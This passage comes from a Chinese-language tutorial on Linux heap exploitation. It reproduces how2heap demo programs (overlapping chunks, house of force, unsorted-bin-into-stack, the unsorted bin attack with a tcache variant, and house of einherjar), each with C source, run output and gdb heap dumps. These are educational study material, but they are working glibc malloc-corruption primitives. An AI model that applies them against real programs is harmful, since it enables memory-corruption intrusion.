fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n");
*(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE
free(p2);
p6 = malloc(0x1b0 - 0x10);
real_size_p6 = malloc_usable_size(p6);
fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6);
fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n");
fprintf(stderr, "p3 before = %s\n", (char *)p3);
memset(p6, 'B', 0xd0);
fprintf(stderr, "p3 after = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks_2.c
$ ./a.out
Now we allocate 5 chunks on the heap
chunk p1: 0x18c2010 ~ 0x18c2028
chunk p2: 0x18c2030 ~ 0x18c20b8
chunk p3: 0x18c20c0 ~ 0x18c2148
chunk p4: 0x18c2150 ~ 0x18c21d8
chunk p5: 0x18c21e0 ~ 0x18c21f8
Let's free the chunk p4
Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)
Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8
Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)
p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
p3 after = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
同样是堆块重叠的问题,前面那个是在 chunk 已经被 free,加入到了 unsorted bin 之后,再修改其 size 值,然后 malloc 一个不一样的 chunk 出来,而这里是在 free 之前修改 size 值,使 free 错误地修改了下一个 chunk 的 prev_size 值,导致中间的 chunk 强行合并。另外前面那个重叠是相邻堆块之间的,而这里是不相邻堆块之间的。
我们需要五个堆块,假设第 chunk 1 存在溢出,可以改写第二个 chunk 2 的数据,chunk 5 的作用是防止释放 chunk 4 后被合并进 top chunk。所以我们要重叠的区域是 chunk 2 到 chunk 4。首先将 chunk 4 释放掉,注意看 chunk 5 的 prev_size 值:
gef➤ x/70gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x0000000000000091 <-- chunk 2
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x4141414141414141
0x6020a0: 0x4141414141414141 0x4141414141414141
0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x4141414141414141 0x4141414141414141
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed]
0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x4141414141414141
0x6021b0: 0x4141414141414141 0x4141414141414141
0x6021c0: 0x4141414141414141 0x4141414141414141
0x6021d0: 0x0000000000000090 0x0000000000000020 <-- chunk 5 <-- prev_size
0x6021e0: 0x4141414141414141 0x4141414141414141
0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk
0x602200: 0x0000000000000000 0x0000000000000000
0x602210: 0x0000000000000000 0x0000000000000000
0x602220: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602140, bk=0x602140
→ Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE)
free chunk 4 被放入 unsorted bin,大小为 0x90。
接下来是最关键的一步,利用 chunk 1 的溢出漏洞,将 chunk 2 的 size 值修改为 chunk 2 和 chunk 3 的大小之和,即 0x90+0x90+0x1=0x121,最后的 1 是标志位。这样当我们释放 chunk 2 的时候,malloc 根据这个被修改的 size 值,会以为 chunk 2 加上 chunk 3 的区域都是要释放的,然后就错误地修改了 chunk 5 的 prev_size。接着,它发现紧邻的一块 chunk 4 也是 free 状态,就把它俩合并在了一起,组成一个大 free chunk,放进 unsorted bin 中。
gef➤ x/70gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x00000000000001b1 <-- chunk 2 [be freed] <-- unsorted bin
0x602030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x4141414141414141
0x6020a0: 0x4141414141414141 0x4141414141414141
0x6020b0: 0x4141414141414141 0x0000000000000091 <-- chunk 3
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x4141414141414141 0x4141414141414141
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x0000000000000091 <-- chunk 4 [be freed]
0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x4141414141414141
0x6021b0: 0x4141414141414141 0x4141414141414141
0x6021c0: 0x4141414141414141 0x4141414141414141
0x6021d0: 0x00000000000001b0 0x0000000000000020 <-- chunk 5 <-- prev_size
0x6021e0: 0x4141414141414141 0x4141414141414141
0x6021f0: 0x4141414141414141 0x0000000000020e11 <-- top chunk
0x602200: 0x0000000000000000 0x0000000000000000
0x602210: 0x0000000000000000 0x0000000000000000
0x602220: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602020, bk=0x602020
→ Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE)
现在 unsorted bin 里的 chunk 的大小为 0x1b0,即 0x90*3。咦,所以 chunk 3 虽然是使用状态,但也被强行算在了 free chunk 的空间里了。
最后,如果我们分配一块大小为 0x1b0-0x10 的大空间,返回的堆块即是包括了 chunk 2 + chunk 3 + chunk 4 的大 chunk。这时 chunk 6 和 chunk 3 就重叠了,结果就像上面运行时打印出来的一样。
3.1.8 Linux 堆利用(下)
- how2heap
- 参考资料
how2heap
house_of_force
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
char bss_var[] = "This is a string that we want to overwrite.";
int main() {
fprintf(stderr, "We will overwrite a variable at %p\n\n", bss_var);
intptr_t *p1 = malloc(0x10);
int real_size = malloc_usable_size(p1);
memset(p1, 'A', real_size);
fprintf(stderr, "Let's allocate the first chunk of 0x10 bytes: %p.\n", p1);
fprintf(stderr, "Real size of our allocated chunk is 0x%x.\n\n", real_size);
intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
fprintf(stderr, "Overwriting the top chunk size with a big value so the malloc will never call mmap.\n");
fprintf(stderr, "Old size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
ptr_top[0] = -1;
fprintf(stderr, "New size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size, we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
void *new_ptr = malloc(evil_size);
int real_size_new = malloc_usable_size(new_ptr);
memset((char *)new_ptr + real_size_new - 0x20, 'A', 0x20);
fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);
void* ctr_chunk = malloc(0x30);
fprintf(stderr, "malloc(0x30) => %p!\n", ctr_chunk);
fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.\n");
fprintf(stderr, "old string: %s\n", bss_var);
strcpy(ctr_chunk, "YEAH!!!");
fprintf(stderr, "new string: %s\n", bss_var);
}
$ gcc -g house_of_force.c
$ ./a.out
We will overwrite a variable at 0x601080
Let's allocate the first chunk of 0x10 bytes: 0x824010.
Real size of our allocated chunk is 0x18.
Overwriting the top chunk size with a big value so the malloc will never call mmap.
Old size of top chunk: 0x20fe1
New size of top chunk: 0xffffffffffffffff
The value we want to write to at 0x601080, and the top chunk is at 0x824028, so accounting for the header size, we will malloc 0xffffffffffddd048 bytes.
As expected, the new pointer is at the same place as the old top chunk: 0x824030
malloc(0x30) => 0x601080!
Now, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.
old string: This is a string that we want to overwrite.
new string: YEAH!!!
house_of_force 是一种通过改写 top chunk 的 size 字段来欺骗 malloc 返回任意地址的技术。我们知道在空闲内存的最高处,必然存在一块空闲的 chunk,即 top chunk,当 bins 和 fast bins 都不能满足分配需要的时候,malloc 会从 top chunk 中分出一块内存给用户。所以 top chunk 的大小会随着分配和回收不停地变化。这种攻击假设有一个溢出漏洞,可以改写 top chunk 的头部,然后将其改为一个非常大的值,以确保所有的 malloc 将使用 top chunk 分配,而不会调用 mmap。这时如果攻击者 malloc 一个很大的数目(负有符号整数),top chunk 的位置加上这个大数,造成整数溢出,结果是 top chunk 能够被转移到堆之前的内存地址(如程序的 .bss 段、.data 段、GOT 表等),下次再执行 malloc 时,攻击者就能够控制转移之后地址处的内存。
首先随意分配一个 chunk,此时内存里存在两个 chunk,即 chunk 1 和 top chunk:
gef➤ x/8gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x0000000000020fe1 <-- top chunk
0x602030: 0x0000000000000000 0x0000000000000000
chunk 1 真实可用的内存有 0x18 字节。
假设 chunk 1 存在溢出,利用该漏洞我们现在将 top chunk 的 size 值改为一个非常大的数:
gef➤ x/8gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 <-- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0xffffffffffffffff <-- modified top chunk
0x602030: 0x0000000000000000 0x0000000000000000
改写之后的 size==0xffffffff。
现在我们可以 malloc 一个任意大小的内存而不用调用 mmap 了。接下来 malloc 一个 chunk,使得该 chunk 刚好分配到我们想要控制的那块区域为止,这样在下一次 malloc 时,就可以返回到我们想要控制的区域了。计算方法是用目标地址减去 top chunk 地址,再减去 chunk 头的大小。
gef➤ x/8gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0xfffffffffffff051
0x602030: 0x0000000000000000 0x0000000000000000
gef➤ x/12gx 0x602010+0xfffffffffffff050
0x601060: 0x4141414141414141 0x4141414141414141
0x601070: 0x4141414141414141 0x0000000000000fa9 <-- top chunk
0x601080 <bss_var>: 0x2073692073696854 0x676e697274732061 <-- target
0x601090 <bss_var+16>: 0x6577207461687420 0x6f7420746e617720
0x6010a0 <bss_var+32>: 0x6972777265766f20 0x00000000002e6574
0x6010b0: 0x0000000000000000 0x0000000000000000
再次 malloc,将目标地址包含进来即可,现在我们就成功控制了目标内存:
gef➤ x/12gx 0x602010+0xfffffffffffff050
0x601060: 0x4141414141414141 0x4141414141414141
0x601070: 0x4141414141414141 0x0000000000000041 <-- chunk 2
0x601080 <bss_var>: 0x2073692073696854 0x676e697274732061 <-- target
0x601090 <bss_var+16>: 0x6577207461687420 0x6f7420746e617720
0x6010a0 <bss_var+32>: 0x6972777265766f20 0x00000000002e6574
0x6010b0: 0x0000000000000000 0x0000000000000f69 <-- top chunk
该技术的缺点是会受到 ASLR 的影响,因为如果攻击者需要修改指定位置的内存,他首先需要知道当前 top chunk 的位置以构造合适的 malloc 大小来转移 top chunk。而 ASLR 将使堆内存地址随机,所以该技术还需同时配合使用信息泄漏以达成攻击。
unsorted_bin_into_stack
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_buf[4] = {0};
unsigned long *victim = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Allocating the victim chunk at %p\n", victim);
// deal with tcache
// int *k[10], i;
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(victim);
fprintf(stderr, "Freeing the chunk, it will be inserted in the unsorted bin\n\n");
stack_buf[1] = 0x100 + 0x10;
stack_buf[3] = (unsigned long)stack_buf; // or any other writable address
fprintf(stderr, "Create a fake chunk on the stack\n");
fprintf(stderr, "fake->size: %p\n", (void *)stack_buf[1]);
fprintf(stderr, "fake->bk: %p\n\n", (void *)stack_buf[3]);
victim[1] = (unsigned long)stack_buf;
fprintf(stderr, "Now we overwrite the victim->bk pointer to stack: %p\n\n", stack_buf);
fprintf(stderr, "Malloc a chunk which size is 0x110 will return the region of our fake chunk: %p\n", &stack_buf[2]);
unsigned long *fake = malloc(0x100);
fprintf(stderr, "malloc(0x100): %p\n", fake);
}
$ gcc -g unsorted_bin_into_stack.c
$ ./a.out
Allocating the victim chunk at 0x17a1010
Freeing the chunk, it will be inserted in the unsorted bin
Create a fake chunk on the stack
fake->size: 0x110
fake->bk: 0x7fffcd906480
Now we overwrite the victim->bk pointer to stack: 0x7fffcd906480
Malloc a chunk which size is 0x110 will return the region of our fake chunk: 0x7fffcd906490
malloc(0x100): 0x7fffcd906490
unsorted-bin-into-stack 通过改写 unsorted bin 里 chunk 的 bk 指针到任意地址,从而在栈上 malloc 出 chunk。
首先将一个 chunk 放入 unsorted bin,并且在栈上伪造一个 chunk:
gdb-peda$ x/6gx victim - 2
0x602000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x602020: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdbd0: 0x0000000000000000 0x00007fffffffdbc0
然后假设有一个漏洞,可以改写 victim chunk 的 bk 指针,那么将其改为指向 fake chunk:
gdb-peda$ x/6gx victim - 2
0x602000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x602010: 0x00007ffff7dd1b78 0x00007fffffffdbc0 <-- bk pointer
0x602020: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdbd0: 0x0000000000000000 0x00007fffffffdbc0
那么此时就相当于 fake chunk 已经被链接到 unsorted bin 中。在下一次 malloc 的时候,malloc 会顺着 bk 指针进行遍历,于是就找到了大小正好合适的 fake chunk:
gdb-peda$ x/6gx victim - 2
0x602000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x602010: 0x00007ffff7dd1bf8 0x00007ffff7dd1bf8
0x602020: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdbc0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdbd0: 0x00007ffff7dd1b78 0x00007fffffffdbc0
fake chunk 被取出,而 victim chunk 被从 unsorted bin 中取出来放到了 small bin 中。另外值得注意的是 fake chunk 的 fd 指针被修改了,这是 unsorted bin 的地址,通过它可以泄露 libc 地址,这正是下面 unsorted bin attack 会讲到的。
将上面的代码解除注释,就是 libc-2.27 环境下的版本,但是需要注意的是由于 tcache 的影响,stack_buf[3]
不能再设置成任意地址。
malloc 前:
gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x555555756260: 0x00007ffff7dd2b00 0x00007fffffffdcb0
0x555555756270: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdcc0: 0x0000000000000000 0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000 0x0000000000000000 <-- counts
0x555555756020: 0x0000000000000000 0x0000000000000000
0x555555756030: 0x0000000000000000 0x0000000000000000
0x555555756040: 0x0000000000000000 0x0000000000000000
0x555555756050: 0x0000000000000000 0x0000000000000000
0x555555756060: 0x0000000000000000 0x0000000000000000
0x555555756070: 0x0000000000000000 0x0000000000000000
0x555555756080: 0x0000000000000000 0x0000555555756670 <-- entries
0x555555756090: 0x0000000000000000 0x0000000000000000
0x5555557560a0: 0x0000000000000000 0x0000000000000000
0x5555557560b0: 0x0000000000000000 0x0000000000000000
0x5555557560c0: 0x0000000000000000 0x0000000000000000
0x5555557560d0: 0x0000000000000000 0x0000000000000000
malloc 后:
gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x555555756260: 0x00007ffff7dd2b80 0x00007ffff7dd2b80
0x555555756270: 0x0000000000000000 0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000110 <-- fake chunk
0x7fffffffdcc0: 0x00007ffff7dd2b00 0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000 0x0700000000000000 <-- counts <-- counts
0x555555756020: 0x0000000000000000 0x0000000000000000
0x555555756030: 0x0000000000000000 0x0000000000000000
0x555555756040: 0x0000000000000000 0x0000000000000000
0x555555756050: 0x0000000000000000 0x0000000000000000
0x555555756060: 0x0000000000000000 0x0000000000000000
0x555555756070: 0x0000000000000000 0x0000000000000000
0x555555756080: 0x0000000000000000 0x0000555555756670 <-- entries
0x555555756090: 0x0000000000000000 0x0000000000000000
0x5555557560a0: 0x0000000000000000 0x0000000000000000
0x5555557560b0: 0x0000000000000000 0x0000000000000000
0x5555557560c0: 0x0000000000000000 0x00007fffffffdcc0 <-- entries
0x5555557560d0: 0x0000000000000000 0x0000000000000000
可以看到在 malloc 时,fake chunk 被不断重复地链接到 tcache bin,直到装满后,才从 unsorted bin 里取出。同样的,fake chunk 的 fd 指向 unsorted bin。
unsorted_bin_attack
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_var = 0;
fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
unsigned long *p = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
free(p);
fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);
p[1] = (unsigned long)(&stack_var - 2);
fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);
malloc(0x80);
fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffc9b1d61b0 -> 0
Now, we allocate first small chunk on the heap at: 0x1066010
We free the first chunk now. Its bk pointer point to 0x7f2404cf5b78
We write it with the target address-0x10: 0x7ffc9b1d61a0
Let's malloc again to get the chunk we just free: 0x7ffc9b1d61b0 -> 0x7f2404cf5b78
unsorted bin 攻击通常是为更进一步的攻击做准备的,我们知道 unsorted bin 是一个双向链表,在分配时会通过 unlink 操作将 chunk 从链表中移除,所以如果能够控制 unsorted bin chunk 的 bk 指针,就可以向任意位置写入一个指针。这里通过 unlink 将 libc 的信息写入到我们可控的内存中,从而导致信息泄漏,为进一步的攻击提供便利。
unlink 的对 unsorted bin 的操作是这样的:
/* remove from unsorted list */
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);
其中 bck = victim->bk
。
首先分配两个 chunk,然后释放掉第一个,它将被加入到 unsorted bin 中:
gef➤ x/26gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 1 [be freed]
0x602010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000090 0x0000000000000020 <-- chunk 2
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6020c0: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx &stack_var-2
0x7fffffffdc50: 0x00007fffffffdd60 0x0000000000400712
0x7fffffffdc60: 0x0000000000000000 0x0000000000602010
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
→ Chunk(addr=0x602010, size=0x90, flags=PREV_INUSE)
然后假设存在一个溢出漏洞,可以让我们修改 chunk 1 的数据。然后我们将 chunk 1 的 bk 指针修改为指向目标地址 - 2,也就相当于是在目标地址处有一个 fake free chunk,然后 malloc:
gef➤ x/26gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 3
0x602010: 0x00007ffff7dd1b78 0x00007fffffffdc50
0x602020: 0x0000000000000000 0x0000000000000000
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000090 0x0000000000000021 <-- chunk 2
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6020c0: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx &stack_var-2
0x7fffffffdc50: 0x00007fffffffdc80 0x0000000000400756 <-- fake chunk
0x7fffffffdc60: 0x00007ffff7dd1b78 0x0000000000602010 <-- fd->TAIL
从而泄漏了 unsorted bin 的头部地址。
那么继续来看 libc-2.27 里怎么处理:
#include <stdio.h>
#include <stdlib.h>
int main() {
unsigned long stack_var = 0;
fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);
unsigned long *p = malloc(0x80);
unsigned long *p1 = malloc(0x10);
fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);
free(p);
fprintf(stderr, "Freed the first chunk to put it in a tcache bin\n");
p[0] = (unsigned long)(&stack_var);
fprintf(stderr, "Overwrite the next ptr with the target address\n");
malloc(0x80);
malloc(0x80);
fprintf(stderr, "Now we malloc twice to make tcache struct's counts '0xff'\n\n");
free(p);
fprintf(stderr, "Now free again to put it in unsorted bin\n");
p[1] = (unsigned long)(&stack_var - 2);
fprintf(stderr, "Now write its bk ptr with the target address-0x10: %p\n\n", (void*)p[1]);
malloc(0x80);
fprintf(stderr, "Finally malloc again to get the chunk at target address: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g tcache_unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffef0884c10 -> 0
Now, we allocate first small chunk on the heap at: 0x564866907260
Freed the first chunk to put it in a tcache bin
Overwrite the next ptr with the target address
Now we malloc twice to make tcache struct's counts '0xff'
Now free again to put it in unsorted bin
Now write its bk ptr with the target address-0x10: 0x7ffef0884c00
Finally malloc again to get the chunk at target address: 0x7ffef0884c10 -> 0x7f69ba1d8ca0
我们知道由于 tcache 的存在,malloc 从 unsorted bin 取 chunk 的时候,如果对应的 tcache bin 还未装满,则会将 unsorted bin 里的 chunk 全部放进对应的 tcache bin,然后再从 tcache bin 中取出。那么问题就来了,在放进 tcache bin 的这个过程中,malloc 会以为我们的 target address 也是一个 chunk,然而这个 "chunk" 是过不了检查的,将抛出 "memory corruption" 的错误:
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize_nomask (victim)
> av->system_mem, 0))
malloc_printerr ("malloc(): memory corruption");
那么要想跳过放 chunk 的这个过程,就需要对应 tcache bin 的 counts 域不小于 tcache_count(默认为7),但如果 counts 不为 0,说明 tcache bin 里是有 chunk 的,那么 malloc 的时候会直接从 tcache bin 里取出,于是就没有 unsorted bin 什么事了:
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
这就造成了矛盾,所以我们需要找到一种既能从 unsorted bin 中取 chunk,又不会将 chunk 放进 tcache bin 的办法。
于是就得到了上面的利用 tcache poisoning(参考章节4.14),将 counts 修改成了 0xff
,于是在进行到下面这里时就会进入 else 分支,直接取出 chunk 并返回:
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
于是就成功泄露出了 unsorted bin 的头部地址。
house_of_einherjar
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
uint8_t *a, *b, *d;
a = (uint8_t*) malloc(0x10);
int real_a_size = malloc_usable_size(a);
memset(a, 'A', real_a_size);
fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n\n", a);
size_t fake_chunk[6];
fake_chunk[0] = 0x80;
fake_chunk[1] = 0x80;
fake_chunk[2] = (size_t) fake_chunk;
fake_chunk[3] = (size_t) fake_chunk;
fake_chunk[4] = (size_t) fake_chunk;
fake_chunk[5] = (size_t) fake_chunk;
fprintf(stderr, "Our fake chunk at %p looks like:\n", fake_chunk);
fprintf(stderr, "prev_size: %#lx\n", fake_chunk[0]);
fprintf(stderr, "size: %#lx\n", fake_chunk[1]);
fprintf(stderr, "fwd: %#lx\n", fake_chunk[2]);
fprintf(stderr, "bck: %#lx\n", fake_chunk[3]);
fprintf(stderr, "fwd_nextsize: %#lx\n", fake_chunk[4]);
fprintf(stderr, "bck_nextsize: %#lx\n\n", fake_chunk[5]);
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);
uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
fprintf(stderr, "We allocate 0xf8 bytes for 'b': %p\n", b);
fprintf(stderr, "b.size: %#lx\n", *b_size_ptr);
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;
fprintf(stderr, "We write a fake prev_size to the last %lu bytes of a so that it will consolidate with our fake chunk\n", sizeof(size_t));
fprintf(stderr, "Our fake prev_size will be %p - %p = %#lx\n\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
fake_chunk[1] = fake_size;
fprintf(stderr, "Modify fake chunk's size to reflect b's new prev_size\n");
fprintf(stderr, "Now we free b and this will consolidate with our fake chunk\n");
free(b);
fprintf(stderr, "Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);
d = malloc(0x10);
memset(d, 'A', 0x10);
fprintf(stderr, "\nNow we can call malloc() and it will begin in our fake chunk: %p\n", d);
}
$ gcc -g house_of_einherjar.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xb31010
Our fake chunk at 0x7ffdb337b7f0 looks like:
prev_size: 0x80
size: 0x80
fwd: 0x7ffdb337b7f0
bck: 0x7ffdb337b7f0
fwd_nextsize: 0x7ffdb337b7f0
bck_nextsize: 0x7ffdb337b7f0
We allocate 0xf8 bytes for 'b': 0xb31030
b.size: 0x101
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100
We write a fake prev_size to the last 8 bytes of a so that it will consolidate with our fake chunk
Our fake prev_size will be 0xb31020 - 0x7ffdb337b7f0 = 0xffff80024d7b5830
Modify fake chunk's size to reflect b's new prev_size
Now we free b and this will consolidate with our fake chunk
